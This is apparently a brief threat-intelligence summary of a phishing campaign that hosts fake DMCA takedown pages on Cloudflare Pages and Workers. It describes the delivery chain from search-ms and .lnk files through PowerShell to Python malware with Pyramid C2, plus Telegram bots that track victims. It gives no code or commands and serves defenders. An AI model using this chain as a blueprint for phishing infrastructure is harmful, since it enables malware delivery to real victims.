A Russian-speaking threat actor has orchestrated a sophisticated phishing campaign abusing Cloudflare’s Pages and Workers services to host deceptive phishing pages disguised as Digital Millennium Copyright Act (DMCA) takedown notices. This campaign manipulates victims into downloading malicious Windows shortcut (.lnk) files via the search-ms protocol, which execute PowerShell scripts that download ZIP archives containing Python-based malware. The malware establishes remote control communication with Pyramid command-and-control (C2) servers. More than 20 domains hosted on Cloudflare networks like pages.dev and workers.dev have been identified, often reusing file names but altering contents to evade detection. The campaign also leverages open directories on networks such as Railnet LLC, a known bulletproof hosting provider linked to malicious cyber activity, to stage payloads. Victims’ IP addresses are reported through attacker-operated Telegram bots, adding an extra monitoring layer. This evolving tactic reflects the threat actor’s efforts to evade detection by blending with legitimate Cloudflare infrastructure and employing additional obfuscation in their malware configuration. Defenders are urged to be vigilant about abuse of protocol handlers and trusted services in this context.